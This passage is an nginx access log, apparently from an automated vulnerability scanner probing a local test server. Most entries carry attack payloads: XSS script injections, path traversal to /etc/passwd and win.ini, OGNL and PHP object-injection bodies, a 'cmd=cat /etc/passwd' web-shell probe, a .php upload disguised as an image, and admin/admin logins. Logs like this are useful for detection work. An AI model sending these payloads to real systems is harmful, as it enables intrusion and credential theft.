HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.193","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wiki/pages/createpage-entervariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?page=/etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /moto/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.194","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-login.php?action=register HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.197","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/info HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/doenterpagevariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"{\x22email\x22:\x22invalid\x22,\x22signUpContext\x22:{},\x22secondaryEmail\x22:\x22\x22,\x22usingNewUi\x22:true}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /servicedesk/customer/user/signup HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Partners/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Nacos-Server", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/canal/config/1/1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /297Mdn3RSxFejX6AnRXbaJ0vqZE HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/createpage.action?spaceKey=myproj HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /access.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /radio/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nginx_status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.215","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/templates2/viewpagetemplate.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /home.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /seminovos/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.195","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /resource/file%3a///etc/passwd/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nginx-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"action=test&configuration=O:10:\x22PMA_Config\x22:1:{s:6:\x22source\x22,s:11:\x22/etc/passwd\x22;}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /scripts/setup.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mgmt/tm/sys/management-ip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.196","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /shop/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"csrfToken={{csrf_token}}&startDate=2022-01-01&endDate=2022-01-01","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php/backend_api/ajax_get_calendar_events HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /guest_auth/poc.php?cmd=cat%20/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.195","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/experimental/test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?r=i/../../../../../etc/passwd HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.995","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /site_cg/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cobbler/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /modules/system/assets/js/framework.combined-min.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"login=admin&pwd=admin&lang=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /op/op.Login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.058","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webacs/pages/common/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /slr/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../../../windows/win.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cblr/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3cscript%3econfirm(297MdpkSHRxTCW7UvoCPrENLKl4)%3c%2fscript%3e&win=2707 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dompdf.php?input_file=dompdf.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.208","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"--e64bdf16c554bbc109cecef6451c26a4\x0D\x0AContent-Disposition: form-data; name=\x22Filedata\x22; filename=\x22297MbEbuFnQmj5r9XFwiWCTwMei.php\x22\x0D\x0AContent-Type: image/jpeg\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A--e64bdf16c554bbc109cecef6451c26a4--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/taskProc/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.198","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.997","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.circleci/config.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) 